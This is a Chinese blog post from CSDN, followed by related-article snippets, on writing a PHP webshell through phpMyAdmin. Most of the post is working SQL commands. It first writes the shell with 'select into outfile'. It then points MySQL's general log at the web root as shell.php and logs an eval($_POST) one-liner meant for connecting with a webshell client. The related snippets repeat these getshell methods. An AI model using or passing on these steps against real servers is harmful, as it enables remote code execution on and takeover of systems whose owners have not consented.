phpMyadmin写shell

最新推荐文章于 2024-07-19 17:23:55 发布
最新推荐文章于 2024-07-19 17:23:55 发布
阅读量906 收藏
点赞数
文章标签: phpmyadmin 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyanjienice/article/details/115498019
版权
本文详细介绍了如何通过SQL的select into outfile功能,绕过权限限制,在日志文件中执行PHP代码,进而进行shell植入。步骤包括检查目录权限、开启日志、执行phpinfo验证解析、执行恶意代码,并提供安全风险提示。
摘要由CSDN通过智能技术生成

select into outfile

使用方法

select load_file('C:/phpStudy/WWW/shell.php')
select '<?php eval($_POST[123]); ?>' into outfile 'C:/phpStudy/WWW/shell.php';

1.查看绝对目录

select @@basedir;

查询结果
2.查看写入权限

SHOW VARIABLES LIKE "secure_file_priv";

在这里插入图片描述
NULL表示禁止,无法写入

利用日志写shell

1.搜索日志文件

SHOW VARIABLES LIKE 'general%'

在这里插入图片描述
OFF 表示日志关闭
C:\phpStudy\MySQL\data\stu1.log 为日志绝对路径

可以通过sql语句打开日志,并且自定义日志的目录,这里我们直接放在 C:/phpStudy/WWW/ ,一定要放在解析目录下

2.执行语句

set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/shell.php';

在这里插入图片描述

表示执行成功

3.写入phpinfo查看是否解析

select '<?php phpinfo();?>';

在这里插入图片描述
正常解析
在这里插入图片描述
4.写入简单一句话,使用蚁剑连接即可

select '<?php  eval($_POST[123]);?>';

在这里插入图片描述

巅峰且豪杰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
web渗透【11】phpmyadminshell的三种方法
司徒荆的博客
05-30 5968
查看phpMyAdmin能否自定义导出文件目录的权限
phpadminshell的四种方式
最新发布
weixin_46365325的博客
07-19 942
场景:当你拿下phpmyadmin后台之后,如何进行下一步操作。
phpMyAdmin(mysql)常见的shell方法及版本漏洞汇总
m0_48108919的博客
02-21 8148
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件 shell 5.通过慢查询shell 6.创建数据库和表写入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
pma:在Laravel Homestead盒子上安装phpMyAdmin的简单shell脚本
02-04
在本教程中,我们将详细讨论如何在Laravel Homestead上安装和配置phpMyAdmin,这将通过一个简单的shell脚本来实现。 首先,让我们了解Laravel Homestead。它是基于Vagrant和VirtualBox的,允许开发者在虚拟机中运行...
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
什么是phpMyAdminphpMyAdmin是一个用PHP编的免费软件工具,旨在处理Web上MySQL管理。 phpMyAdmin在MySQL和MariaDB上支持多种操作。 可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,...
phpMyAdmin
06-27
它的设计目标是让用户通过浏览器界面就能方便地执行各种数据库管理任务,无需深入掌握SQL语法或者具备服务器端的shell访问权限。这个工具尤其适合那些希望在远程或本地服务器上轻松管理数据库的个人和小型团队。 ##...
lamp:安装LAMP(Apache,MySQLMariaDB,PHP,phpMyAdmin
03-28
可以选择在phpMyAdmin中创建一个帐户。 支持系统 CentOS-6.x CentOS-7.x(推荐) Debian-8.x Debian-9.x Debian-10.x(推荐) Ubuntu-16.x Ubuntu-18.x Ubuntu-20.x(推荐) 软件版本 阿帕奇-2.4 MariaDB-...
vagrant-server:带有 LAMP、phpMyAdmin、ajenti web 面板的 vagrant 上的 CentOs 服务器
06-16
安装包阿帕奇mysql php 5.6 顶麦克多路复用器纳米阿让蒂我的管理员鱼码头工人阿让蒂Ajenti 将在以下位置提供: https://ip:8000 我的管理员对于没有 root 密码的编辑文件: sudo nano /etc/phpmyadmin/config.inc....
phpmyadmin通过日志shell
m0_53087192的博客
01-07 925
1.查看general log是否开启 show variables like ‘%general%’; 打开general_log日志读功能 SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’; 查看绝对路径(探针等) shell,会把执行的语句shell.php,然后我们查询一下 SET GLOBAL general_log_file=‘C://phpStudy//PHPTutorial//WWW//shel
mysql 开启日志 shell_Phpmyadmin日志getshell
weixin_39531378的博客
01-19 598
这个算是一个很常见也很基础的getshell的方式,昨天有个小伙伴问到我这个问题,说面试的时候主管给了他一个phpmyadmin登录入口,让他getshell,由于实战经验较少,小伙伴那道题没拿到分。其实,看到phpmyadmin,第一反应就应该是日志getshell。为了防止大家继续踩坑,特地科普一波。大家看了以后记得在本地phpstudy环境内动手测试一下,以免后面再遇到这类面试题不知道怎么...
phpmyadmin页面getshell(2)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
04-04 422
查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销general_log_file为日志保存的位置。
phpmyadmin getshell
10-29 255
本来搞了一个站,想记录一下,结果手抖刷新了一下文章的界面,了一大半的文章就没了… 简单说一下, 进入 phpmyadmin 后,getshell 有两种办法。一是执行sql语句导出shell到web目录下;二是开启日志功能,改变日志文件到web目录下,然后执行sql语句,在sql语句中php代码。 其中,方法一需要满足三个条件:①数据库root权限;②知道web目录的绝对路径;③mys...
phpmyadmin页面getshell
qq_52469895的博客
04-10 2395
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
phpmyadmin登录后台后利用日志或file_into写入webshell
不想当脚本小子的脚本小子
01-15 566
必须为root权限并且已知网站路径: 在后台管理界面中,将general log改为ON ,general log file另存为网站目录下(webshell必须写入到网站目录下) 再利用sql语句写入用菜刀连接即可
phpmyadmin之getshell总结
Adminxe的博客
05-03 506
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接写入 2、开启全局日志getshell 3、使用慢查询日志getse...
shell脚本安装phpmyadmin
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora:yum install php 3.安装apache web服务器(如果尚未安装): - Debian/Ubuntu:apt-get install apache2 - CentOS/Fedora:yum install httpd 4.安装phpMyAdmin: - Debian/Ubuntu:apt-get install phpmyadmin - CentOS/Fedora:yum install phpMyAdmin 5.在安装期间,你可能会被要求输入mysql数据库管理员的用户名和密码。如果你还没有设置它们,请先在mysql中设置一个管理员用户名和密码。 6.启动Web服务器: - Debian/Ubuntu:service apache2 start - CentOS/Fedora:service httpd start
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值